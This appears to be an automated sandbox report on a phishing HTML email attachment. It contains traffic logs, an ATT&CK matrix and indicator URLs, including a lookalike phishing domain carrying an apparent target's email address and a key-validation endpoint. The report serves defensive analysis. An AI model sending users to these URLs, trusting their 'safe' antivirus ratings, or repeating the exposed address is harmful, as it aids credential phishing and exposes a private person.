Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3141sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGosec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 17:52:36 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: nEuODolTAjbRNJVXAFDykXg/y5R9iITJ9+A=$CN+h/E7ag6D/VDTgServer: cloudflareCF-RAY: 8fe5cd75d8764310-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 17:52:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: oV6WNCrDGPKMTRvPvQOUJtKNWJLYeiuJnZs=$/1C8kUfbw2IH5LxyServer: cloudflareCF-RAY: 8fe5cd880af7c336-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 17:52:43 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: SYYgvhwZkRj9UE4/Zcbs802PYhKOZShsetI=$8vuSKRBqss08FdF6Server: cloudflareCF-RAY: 8fe5cda1fe9bc407-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_121.2.dr, chromecache_122.2.dr, chromecache_104.2.drString found in binary or memory: https://arab-oil.online
Source: chromecache_140.2.drString found in binary or memory: https://blogs.windows.com/windowsdeveloper/2018/12/11/windows-server-2019-includes-openssh/
Source: chromecache_140.2.drString found in binary or memory: https://blogs.windows.com/windowsexperience/2018/10/09/updated-version-of-windows-10-october-2018-up
Source: chromecache_140.2.drString found in binary or memory: https://blogs.windows.com/windowsexperience/2018/11/13/resuming-the-rollout-of-the-windows-10-octobe
Source: chromecache_121.2.dr, chromecache_122.2.dr, chromecache_104.2.drString found in binary or memory: https://code.jquery.com/jquery-3.7.1.min.js
Source: chromecache_140.2.drString found in binary or memory: https://commons.wikimedia.org/wiki/Category:Windows_Server_2019
Source: chromecache_140.2.drString found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/deed.en
Source: chromecache_140.2.drString found in binary or memory: https://developer.wikimedia.org
Source: chromecache_140.2.drString found in binary or memory: https://donate.wikimedia.org/?wmf_source=donate&wmf_medium=sidebar&wmf_campaign=en.wikipedia
Source: chromecache_140.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement
Source: chromecache_140.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy
Source: chromecache_140.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use
Source: chromecache_140.2.drString found in binary or memory: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct
Source: chromecache_108.2.dr, chromecache_152.2.drString found in binary or memory: https://geohack.toolforge.org/geohack.php?pagename=
Source: chromecache_87.2.dr, chromecache_143.2.drString found in binary or memory: https://intake-analytics.wikimedia.org
Source: chromecache_87.2.dr, chromecache_143.2.drString found in binary or memory: https://intake-analytics.wikimedia.org/v1/events?hasty=true
Source: chromecache_87.2.dr, chromecache_143.2.drString found in binary or memory: https://intake-logging.wikimedia.org/v1/events?hasty=true
Source: chromecache_140.2.drString found in binary or memory: https://login.wikimedia.org/wiki/Special:CentralAutoLogin/start?useformat=desktop&type=1x1&u
Source: chromecache_121.2.dr, chromecache_122.2.dr, chromecache_104.2.drString found in binary or memory: https://natrium100gram.site/public/api/validate_key/$
Source: chromecache_108.2.dr, chromecache_152.2.drString found in binary or memory: https://phabricator.wikimedia.org/maniphest/task/create/?projects=PHID-PROJ-cabyqp5sf4hyvauln3sq
Source: chromecache_112.2.dr, chromecache_85.2.drString found in binary or memory: https://porposal-ach.pages.dev/#?service=
Source: chromecache_151.2.drString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: chromecache_140.2.drString found in binary or memory: https://softtrader.eu/blog-microsoft/windows-server-2019-essentials-standard-datacenter/
Source: chromecache_144.2.dr, chromecache_94.2.drString found in binary or memory: https://tiny-hat-eab8.pagenew.workers.dev
Source: chromecache_139.2.dr, chromecache_123.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/8/8c/Two_women_operating_ENIAC_%28full_resolution%29.
Source: chromecache_100.2.dr, chromecache_150.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/c/c0/MediaWiki_footer_link_ltr.svg
Source: chromecache_90.2.dr, chromecache_146.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/300px-Software_dev2.svg.
Source: chromecache_90.2.dr, chromecache_146.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Software_dev2.svg/320px-Software_dev2.svg.
Source: chromecache_139.2.dr, chromecache_123.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/8c/Two_women_operating_ENIAC_%28full_resoluti
Source: chromecache_140.2.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/en/e/ed/Windows_Server_2019_desktop_screenshot.png
Source: chromecache_140.2.drString found in binary or memory: https://web.archive.org/web/20190202205420/https://www.computerworld.com/article/3311978/microsoft-w
Source: chromecache_140.2.drString found in binary or memory: https://web.archive.org/web/20190329192750/https://www.zdnet.com/article/new-windows-server-2019-tes
Source: chromecache_140.2.drString found in binary or memory: https://web.archive.org/web/20190628091223/https://blogs.windows.com/windowsexperience/2018/11/13/re
Source: chromecache_140.2.drString found in binary or memory: https://web.archive.org/web/20190923212522/https://www.networkworld.com/article/3265052/top-6-featur
Source: chromecache_140.2.drString found in binary or memory: https://web.archive.org/web/20191009130908/https://blogs.windows.com/windowsexperience/2018/10/09/up
Source: chromecache_140.2.drString found in binary or memory: https://wikimediafoundation.org/
Source: chromecache_140.2.drString found in binary or memory: https://www.computerworld.com/article/3311978/microsoft-windows/microsoft-yanks-buggy-win10-1809-upg
Source: chromecache_140.2.drString found in binary or memory: https://www.mediawiki.org/
Source: chromecache_87.2.dr, chromecache_143.2.drString found in binary or memory: https://www.mediawiki.org/w/api.php
Source: chromecache_134.2.dr, chromecache_127.2.drString found in binary or memory: https://www.mediawiki.org/wiki/Extension:VisualEditor/Skin_requirements
Source: chromecache_134.2.dr, chromecache_127.2.drString found in binary or memory: https://www.mediawiki.org/wiki/Manual:Messages_API#Feature_support_in_JavaScript
Source: chromecache_134.2.dr, chromecache_127.2.drString found in binary or memory: https://www.mediawiki.org/wiki/Specs/HTML/2.8.0
Source: chromecache_137.2.dr, chromecache_151.2.drString found in binary or memory: https://www.mediawiki.org/wiki/Specs/Summary/1.2.0
Source: chromecache_140.2.drString found in binary or memory: https://www.networkworld.com/article/3265052/top-6-features-in-windows-server-2019.html
Source: chromecache_140.2.drString found in binary or memory: https://www.tigera.io/tigera-products/userco/
Source: chromecache_148.2.dr, chromecache_98.2.drString found in binary or memory: https://www.wikidata.org
Source: chromecache_87.2.dr, chromecache_143.2.drString found in binary or memory: https://www.wikidata.org/w/api.php
Source: chromecache_140.2.drString found in binary or memory: https://www.wikidata.org/wiki/Special:EntityPage/Q50911826
Source: chromecache_140.2.drString found in binary or memory: https://www.wikidata.org/wiki/Special:EntityPage/Q50911826#sitelinks-wikipedia
Source: chromecache_140.2.drString found in binary or memory: https://www.zdnet.com/article/new-windows-server-2019-test-build-adds-more-clustering-features/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: classification engineClassification label: mal60.phis.evad.winHTM@20/114@46/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT562720.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1976,i,13158292659480297210,1621453939140993406,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1976,i,13158292659480297210,1621453939140993406,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://abb0tt.net/#susan.andrews@jeffparish.netHTTP Parser: https://abb0tt.net/#susan.andrews@jeffparish.net
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://porposal-ach.pages.dev/0%Avira URL Cloudsafe
https://natrium100gram.site/public/api/validate_key/$0%Avira URL Cloudsafe
https://abb0tt.net/0%Avira URL Cloudsafe
https://developer.wikimedia.org0%Avira URL Cloudsafe
https://phabricator.wikimedia.org/maniphest/task/create/?projects=PHID-PROJ-cabyqp5sf4hyvauln3sq0%Avira URL Cloudsafe
https://natrium100gram.site/public/api/validate_key/tes20%Avira URL Cloudsafe
https://tiny-hat-eab8.pagenew.workers.dev/0%Avira URL Cloudsafe
https://porposal-ach.pages.dev/#?service=0%Avira URL Cloudsafe
file:///C:/Users/user/Desktop/ATT562720.htm0%Avira URL Cloudsafe
